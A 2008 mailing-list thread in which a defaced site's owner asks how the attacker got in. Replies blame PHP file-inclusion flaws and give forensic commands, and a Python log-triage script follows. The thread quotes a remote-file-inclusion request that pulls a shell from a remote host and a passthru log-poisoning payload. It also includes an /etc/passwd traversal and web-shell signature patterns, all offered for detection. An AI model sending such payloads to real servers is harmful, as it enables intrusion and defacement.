Hacked by aLpTurkTegin, help patching this hole

by MiFa-2

Our website was defaced by aLpTurkTegin.  We are running Apache, PHP, etc.  Does anyone know how this hacker is getting in and what I can do to prevent this?

Our main web directory had all but one file deleted and hackedIndex.php, a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main directory.  The fact that the webserver served hackedindex.php makes me think it's an Apache web server flaw.

Any comments, suggestions?
Thanks, -D

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------


Re: Hacked by aLpTurkTegin, help patching this hole

by Jay Dyson

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 20 May 2008, Mifa wrote:

> Our website was defaced by aLpTurkTegin.  We are running Apache, PHP,
> etc.  Does anyone know how this hacker is getting in and what I can do
> to prevent this?
>
> Our main web directory had all but one file deleted and hackedIndex.php,
> a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main
> directory.  The fact that the webserver served hackedindex.php makes me
> think it's an Apache web server flaw.
>
> Any comments, suggestions?

Not enough information is provided to yield an accurate assessment (for
example, the PHP version, Apache version, other services running on the
system, permissions of the affected directory, whether the site is
vhosted, et cetera).  With that in mind, it's anyone's guess and the best
response you're going to get is a shot in the dark.  Moreover, just
because your web content was affected doesn't necessarily mean that the
web server is at fault.

My $0.02: the intruder exploited a common flaw in one of your PHP scripts.
PHP, for all its ease of use, has a habit of being the weakest link in a
lot of web sites.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (TreacherOS)
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iD8DBQFINF8W5uViX8vEG7URAjUdAJ9wG1GdDf9fmw5OYwTJby7Xe1qWlQCfYknh
+H4GMqSBuYIk5Yx+Wk0JSjU=
=zKjC
-----END PGP SIGNATURE-----



Re: Hacked by aLpTurkTegin, help patching this hole

by Utmost Bastard

Could be any of the following...

1) If co-hosted, any of the other sites could have been compromised.
2) Writable dir anywhere
3) SQL injected shell
4) Exploitable script/program
5) Missing patches
6) Easily cracked user/pass/service account
7) Misconfiguration in just about anything
8) About 100000 other things.


You must be more specific. Provide logs, patch level, version levels,
scripts used, check dir permissions, state type of hosting, etc.



----- Original Message -----
From: "Mifa" <mifa@...>
To: <pen-test@...>
Sent: Tuesday, May 20, 2008 8:46 AM
Subject: Hacked by aLpTurkTegin, help patching this hole


> Our website was defaced by aLpTurkTegin.  We are running Apache, PHP, etc.
> Does anyone know how this hacker is getting in and what I can do to
> prevent this?
>
> Our main web directory had all but one file deleted and hackedIndex.php,
> a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main
> directory.  The fact that the webserver served hackedindex.php makes me
> think it's an Apache web server flaw.
>
> Any comments, suggestions?
> Thanks, -D
>




Re: Hacked by aLpTurkTegin, help patching this hole

by Morning Wood

one would think it was your php application that was the vector of attack
hint: google "your-php-app"+exploit or "your-php-app"+vulnerability

have fun

----- Original Message -----
> Our website was defaced by aLpTurkTegin.
>  We are running Apache, PHP, etc.




Re: Hacked by aLpTurkTegin, help patching this hole

by Danux

Hi,

Well, when using PHP apps, it's common to find flaws related to what
is called LFI (Local File Inclusion); there are a lot of cases in
phpMyAdmin, Mambo, Joomla, and so on, and if you have your own
applications written in PHP you should try to avoid this.

There are a lot of flaws related to PHP, and as I mentioned, if you
have LFI bugs, it's almost a fact that your site will be hacked.
Try to see in your error_log from Apache if there is PHP code inserted
into it. It's common to insert things like <?
stripslashes(passthru($cmd)) ?> to bypass magic_quotes_gpc.

But the best thing to do is to analyze your sites with some tools
like Acunetix, Nikto, and code review, and patch all bugs found.

Hope this helps.


On Tue, May 20, 2008 at 7:46 AM, Mifa <mifa@...> wrote:

> Our website was defaced by aLpTurkTegin.  We are running Apache, PHP, etc.  Does anyone know how this hacker is getting in and what I can do to prevent this?
>
> Our main web directory had all but one file deleted and hackedIndex.php, a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main directory.  The fact that the webserver served hackedindex.php makes me think it's an Apache web server flaw.
>
> Any comments, suggestions?
> Thanks, -D
>



--
Danux, CISSP, OSCP, ISO27001
Offensive Security Consultant
Macula Security Consulting Group
www.macula-group.com



Re: Hacked by aLpTurkTegin, help patching this hole

by yummy

What user ownership did the hacked files have: the user account, or the webserver?

In my experience, if it was the user account, then there was a weak
password and it was brute-forced. Check the FTP logs for file uploads
for that user account.

If it was owned by the webserver, then there is probably
exploitable PHP code on the site and usually it is due to a remote
file inclusion.
Check the Apache domlogs; you might get lucky and find something.
RFI entries often look something like:

 69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"

In that above example, the PHP file "settings.inc.php" is vulnerable
and allows for the code in a PHP file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a PHP shell.

Of course this is just an example, you'd have to find what is being
exploited by what the others have suggested...

Sorry, this is kinda long-winded and pretty much what everyone else
said, but I have to deal with annoying defacement of sites every day.
People that do that really bug me, plus I'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent a lot of naughtiness
from happening.

I also like to check for Perl procs running as the webserver id,
world-writable directories, and PHP shells located in user accounts.

find /home/useraccountname/public_html/ -type d -perm 777

will locate insecure directories.

The following oneliner will find many common phpshells:

find /home/*/public_html -type f -print0 | xargs -0 egrep '(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

it may take quite a while to complete depending on how many files
there are on the server.

My money is on an outdated php CMS/forum like phpbb, etc.. like
everyone else mentioned...

On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa@...> wrote:

>
> Our website was defaced by aLpTurkTegin.  We are running Apache, PHP, etc.  Does anyone know how this hacker is getting in and what I can do to prevent this?
>
> Our main web directory had all but one file deleted and hackedIndex.php, a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main directory.  The fact that the webserver served hackedindex.php makes me think it's an Apache web server flaw.
>
> Any comments, suggestions?
> Thanks, -D
>

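Two of the replies above point at the same triage step: yummy's advice to read the Apache domlogs for RFI requests that carry a URL as a parameter value, and Danux's advice to look for PHP code that an attacker has pushed into the Apache logs. The script below is an added example, not code posted by anyone in this thread. It parses combined-format access log lines, decodes parameter values a second time so double-encoded payloads are seen in their final form, and flags three shapes: a parameter whose value is a URL (RFI), a parameter with traversal, NUL truncation or a system path (LFI), and a PHP open tag with a command-execution function anywhere in the line (log poisoning, usually via the User-Agent). The regexes, the `scan`/`classify`/`parse_line` names and all sample lines except the one yummy quoted are my own constructions and should be tuned to real logs.

```python
"""Triage Apache access-log lines for file-inclusion indicators.

Added example, not code from the thread. The regexes and the sample lines
marked "constructed" are assumptions; tune them to your own logs.
"""
import re
from urllib.parse import parse_qs, unquote

# Apache combined format: ip ident user [time] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# RFI shape: a parameter value that is itself a URL (include_path=http://...).
RFI_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# LFI shapes: traversal, absolute reads of system paths, NUL truncation, PHP stream wrappers.
LFI_VALUE = re.compile(r'(?:\.\./|\.\.\\|^/etc/|^/proc/|\x00|^php://|^data:)', re.IGNORECASE)
# Log poisoning: a PHP open tag followed by a command-execution function anywhere in the
# raw line (typically placed in the User-Agent so it lands in a log that is later included).
PHP_TAG = re.compile(r'<\?(?:php)?\s*.*?\b(?:passthru|system|exec|shell_exec|eval)\s*\(',
                     re.IGNORECASE | re.DOTALL)


def parse_line(line):
    """Return a dict of fields for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    # Not urlsplit: a target beginning with "//" would be read as a host, and the
    # request yummy quoted starts exactly that way.
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    # parse_qs percent-decodes once; decode again so double-encoded payloads
    # (..%252F) are seen in their final form. keep_blank_values keeps "?cmd=".
    rec['params'] = {
        name: [unquote(v) for v in values]
        for name, values in parse_qs(query, keep_blank_values=True).items()
    }
    return rec


def classify(rec):
    """Return (kind, param, value) tuples for every suspicious parameter value."""
    hits = []
    for name, values in rec['params'].items():
        for value in values:
            if RFI_VALUE.search(value):
                hits.append(('RFI', name, value))
            elif LFI_VALUE.search(value):
                hits.append(('LFI', name, value))
    return hits


def scan(lines):
    """Run every line through the parser and classifiers; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base = {'ip': rec['ip'], 'path': rec['path'], 'status': rec['status']}
        for kind, name, value in classify(rec):
            findings.append(dict(base, kind=kind, param=name, value=value))
        tag = PHP_TAG.search(line)
        if tag:
            findings.append(dict(base, kind='PHP-INJECT', param=None, value=tag.group(0)))
    return findings


SAMPLE_LOG = [
    # constructed: an ordinary page view that must not be flagged
    '10.0.0.5 - - [25/Jan/2008:10:20:01 -0500] "GET /index.php?page=news HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # the RFI request quoted in the thread, re-joined onto one line with a user-agent field
    '69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-" "-"',
    # constructed: double-encoded traversal with NUL truncation
    '198.51.100.7 - - [25/Jan/2008:10:24:10 -0500] "GET /modules/view.php?file=..%252F..%252F..%252Fetc%252Fpasswd%2500 HTTP/1.1" 200 812 "-" "-"',
    # constructed: LFI of the access log itself plus a PHP tag smuggled in the User-Agent
    '203.0.113.9 - - [25/Jan/2008:10:25:00 -0500] "GET /index.php?page=../../../var/log/apache2/access.log%00 HTTP/1.1" 200 77 "-" "<?php passthru($_GET[c]); ?>"',
    # constructed: garbage that the parser must skip rather than crash on
    'not a log line',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:<10} {f['ip']:<15} {f['path']} param={f['param']!r} value={f['value']!r}")
```

Feed it the domlog with `scan(open('access_log'))` and sort the findings by IP; a single address producing RFI hits against one script is the usual sign of the automated scanner that precedes a defacement, and the `path` field tells you which script to patch or remove. The double decoding matters: without it the `..%252F` line would pass the traversal check untouched.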